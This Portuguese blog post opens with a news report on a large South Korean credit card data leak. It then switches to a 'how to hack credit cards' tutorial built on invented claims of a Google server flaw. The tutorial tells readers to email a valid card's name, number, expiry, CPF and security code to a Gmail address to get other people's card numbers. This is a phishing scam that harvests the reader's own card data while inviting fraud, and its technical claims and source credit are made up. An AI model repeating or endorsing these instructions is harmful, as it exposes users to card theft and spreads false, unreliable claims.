Vazamento de dados de cartões de crédito apavora sul-coreanos

Milhares de sul-coreanos correram aos bancos, na terça-feira (21/01), pra cancelar os cartões de crédito. O pânico foi consequência do vazamento de dados de praticamente metade da população.

Foi assim o dia inteiro em bancos e empresas de cartão de crédito na Coreia do Sul: pessoas procurando saber como estavam suas contas, todas temendo prejuízos.

O maior vazamento de informações do país atingiu 20 milhões de coreanos. Nem a presidente Park Geun-hye escapou.

Bastou um funcionário de uma companhia que analisa o perfil de crédito dos clientes ter acesso aos dados de três empresas de cartões. Nada estava protegido e tudo foi copiado: números, nomes, telefones e endereços. As informações teriam sido vendidas para empresas de marketing e empréstimos.

Os roubos aconteceram em fevereiro, junho e dezembro do ano passado. As empresas de cartões só teriam tomado conhecimento depois do início da investigação. E pediram desculpas.

As autoridades sul-coreanas afirmam que as administradoras vão assumir a responsabilidade por possíveis prejuízos, mas que até agora não foram registradas movimentações anormais.

Três pessoas foram presas, mas a desconfiança continua. "Essas empresas precisam acordar, eu não posso usar o cartão nessas circunstâncias", disse um cliente.

Caso parecido aconteceu nos Estados Unidos, em dezembro do ano passado: no auge da temporada de Natal, uma das maiores redes de lojas, a Target, viu dados de 40 milhões de cartões serem roubados.

Na Coreia do Sul, a investigação agora é para saber como as empresas que tiveram seus bancos de dados copiados protegem informação tão importante.

 

VEJA COMO FOI FEITO !!!

 

Como HACKEAR números de Cartão de Créditos?


Um engenheiro da GOOGLE em 2006 deixou brechas de segurança que nunca foram encontradas ou arrumadas.


Deixou implementada nos servidores uma maneira muito fácil para roubar números de cartões de créditos por e-mail! 

 

Vou explicar melhor…

Sempre quando alguêm faz uma compra na internet com cartões de créditos, as informações ficam armazenadas em um servidor de dados, alguns seguros outros nem tanto! 

 

Todos sabemos que brechas de segurança estão ai para serem exploradas. 

 

Os funcionários da GOOGLE são campeões nesse aspecto. 

 

Seus servidores são tão inseguros que várias operações podem ser feitas sem muitos problemas como: – enviar e-mail sem estar autenticado e pasmem… roubar cartões de créditos armazenados em seus servidores.

Foi descoberta uma falha em um servidor, através de um e-mail que permite ao hacker enviar pra o servidor linhas de código que acabam gerando um Bug e após confirmar umas informações lhe retorna as informações de cartão de crédito dos últimos 5 clientes ativos.

VEJA COMO É FACIL:

Para que você receba as informações corretamente siga as instruções(tem que ser do jeito que está aqui):

mande um e-mail para: servercardword@gmail.com

com assunto: accnto0545-cc-ecard-infoE 52488-Cod.05 ( isto vai gerar o bug no servidor – não use espaços!)

Note que na primeira linha da mensagem você deverá colocar as informações de um cartão válido – porque quando você mandar o e-mail o servidor com o bug faz uma breve confirmação de dados do cartão (é a única barreira de segurança dele) – então não adianta colocar numero de cartão falso porque não funciona – tem que ser cartão verdadeiro que funcione! Siga o exemplo de como colocar no e-mail:

(1ª linha)
000003#//0000003##        (não mude isso – é como uma chave de segurança do servidor)

(2ª Linha) 

Aqui você vai colocar as informações do cartão válido, que você vai usar pra entrar no servidor.

Tem que ser um cartão válido!

Name#:                     (Nome que está no cartão válido – do jeito que está no cartão)

Number-e-card#:       (Número do cartão válido – o mesmo cartão que você colocou o nome)

e-card#Grup#:          (Nome da empresa do cartão válido – Mastercard, Visa, Credicard, etc)

Vili# mm/aa:             (Aqui você coloca a data de válidade do cartão válido – mês /ano)

cpf###:                     (Número do cpf do dono do cartão – para verificação do sistema)

number-segurity##:   _ _ _  / sytem0000478547#####03    ( Não mude este número, geralmente é os 3 últimos digitos e está atras do cartão de crédito)

return in time#:0015 (tempo de retorno das informações – sugiro que seja 15 min)

return#: (coloque entre o e-mail que você deseja que retorne os números dos cartões.

 

 

VIU COMO É FÁCIL, FIQUE ATENTO !!!

Fonte: Site Fantástico – Rede Globo/ Alfenas Agora.

You may also like...

0 thoughts on “Vazamento de dados de cartões de crédito apavora sul-coreanos”

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *